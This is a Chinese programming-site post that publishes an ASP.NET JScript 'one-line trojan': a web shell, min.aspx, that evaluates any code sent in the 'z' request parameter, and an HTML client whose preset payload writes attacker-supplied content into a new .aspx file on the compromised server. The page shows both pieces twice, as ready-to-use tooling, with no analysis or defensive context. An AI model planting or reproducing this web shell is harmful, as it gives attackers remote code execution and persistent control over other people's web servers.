asp.net jscript 一句话木马
程序员文章站
2023-09-20 12:55:47
min.aspx复制代码 代码如下:<%@ page language="jscript"%><%eval(request.item[...
min.aspx
<%@ page language="jscript"%><%eval(request.item["z"],"unsafe");%>
<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-type" content="text/html; charset=gb2312" />
<style type="text/css">
td,table,tr {
list-style: none;
font-family: verdana, arial, helvetica, sans-serif;
font-size: 12px;
line-height: 180%;
}
input,textarea {
width:780px;
}
</style>
<title>aspx一句话木马客户端</title></head>
<body bgcolor="d4d0c8">
<hr>
<table width="100%" border="0" cellpadding="4" cellspacing="0" bgcolor="#d4d0c8">
<form action="sdfsdf" method="post" name="sform" id="sform">
<tr>
<td width="74" align="right" valign="bottom">url:</td>
<td width="885" valign="bottom"><input name="url" type="text" id="url" value="http://" /></td>
</tr>
<tr>
<td align="right" valign="top">操作:</td>
<td><textarea name=z rows=10 width=45>
var nonamed=new system.io.streamwriter(server.mappath("名称.aspx"),false);
nonamed.write(request.item["l"]);
nonamed.close();</textarea></td>
</tr>
<tr>
<td align="right" valign="top">写入内容:</td>
<td><p>
<textarea name=l rows=13 width=45></textarea>
<input type="button" value="提交" onclick="javascript:document.sform.action=document.sform.url.value;submit();" />
</p>
</td>
</tr>
<tr>
<td align="right"> </td>
<td>
<div align="left">
<p>服务端: min.aspx 客户端:client.htm</p>
</div>
</td>
</tr>
</form>
</table>
<hr>
</body>
</html>
复制代码 代码如下:
<%@ page language="jscript"%><%eval(request.item["z"],"unsafe");%>
复制代码 代码如下:
<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-type" content="text/html; charset=gb2312" />
<style type="text/css">
td,table,tr {
list-style: none;
font-family: verdana, arial, helvetica, sans-serif;
font-size: 12px;
line-height: 180%;
}
input,textarea {
width:780px;
}
</style>
<title>aspx一句话木马客户端</title></head>
<body bgcolor="d4d0c8">
<hr>
<table width="100%" border="0" cellpadding="4" cellspacing="0" bgcolor="#d4d0c8">
<form action="sdfsdf" method="post" name="sform" id="sform">
<tr>
<td width="74" align="right" valign="bottom">url:</td>
<td width="885" valign="bottom"><input name="url" type="text" id="url" value="http://" /></td>
</tr>
<tr>
<td align="right" valign="top">操作:</td>
<td><textarea name=z rows=10 width=45>
var nonamed=new system.io.streamwriter(server.mappath("名称.aspx"),false);
nonamed.write(request.item["l"]);
nonamed.close();</textarea></td>
</tr>
<tr>
<td align="right" valign="top">写入内容:</td>
<td><p>
<textarea name=l rows=13 width=45></textarea>
<input type="button" value="提交" onclick="javascript:document.sform.action=document.sform.url.value;submit();" />
</p>
</td>
</tr>
<tr>
<td align="right"> </td>
<td>
<div align="left">
<p>服务端: min.aspx 客户端:client.htm</p>
</div>
</td>
</tr>
</form>
</table>
<hr>
</body>
</html>
上一篇: 不要脸的年轻人